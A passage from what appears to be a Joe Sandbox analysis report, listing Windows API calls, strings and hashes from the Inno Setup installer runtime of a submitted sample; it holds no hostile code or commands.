                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                            • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                            • Instruction Fuzzy Hash:
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                            • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                            • API String ID: 2323315520-3614243559
                                                                                            • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                            • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                            • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                            • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0045862F
                                                                                            • QueryPerformanceCounter.KERNEL32(02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 00458638
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00458642
                                                                                            • GetCurrentProcessId.KERNEL32(?,02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 0045864B
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 004586CF
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                            • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                            • API String ID: 770386003-3271284199
                                                                                            • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                            • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                            • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                            • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                            APIs
                                                                                              • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                              • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                              • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                              • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC), ref: 004783CC
                                                                                              • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                              • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02112BDC,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                            • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                            • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                            • API String ID: 883996979-221126205
                                                                                            • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                            • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1631623395-0
                                                                                            • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                            • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00418393
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                            • GetWindowRect.USER32(?), ref: 004183CC
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                            • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                            • String ID: ,
                                                                                            • API String ID: 2266315723-3772416878
                                                                                            • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                            • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 107509674-3733053543
                                                                                            • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                            • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                            • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CryptVersion
                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                            • API String ID: 1951258720-508647305
                                                                                            • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                            • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                            • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                            • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                            • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                                            • String ID: isRS-$isRS-???.tmp
                                                                                            • API String ID: 134685335-3422211394
                                                                                            • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                            • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                            • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                            • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                            APIs
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                            • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                            Strings
                                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                            • API String ID: 2236967946-3182603685
                                                                                            • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                            • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                            • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                            • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                            • API String ID: 1646373207-3712701948
                                                                                            • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                            • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                            • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                            • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Placement$Iconic
                                                                                            • String ID: ,
                                                                                            • API String ID: 568898626-3772416878
                                                                                            • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                            • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                            • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                            • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                            • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                                            • String ID:
                                                                                            • API String ID: 4011626565-0
                                                                                            • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                            • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                            • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                            • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
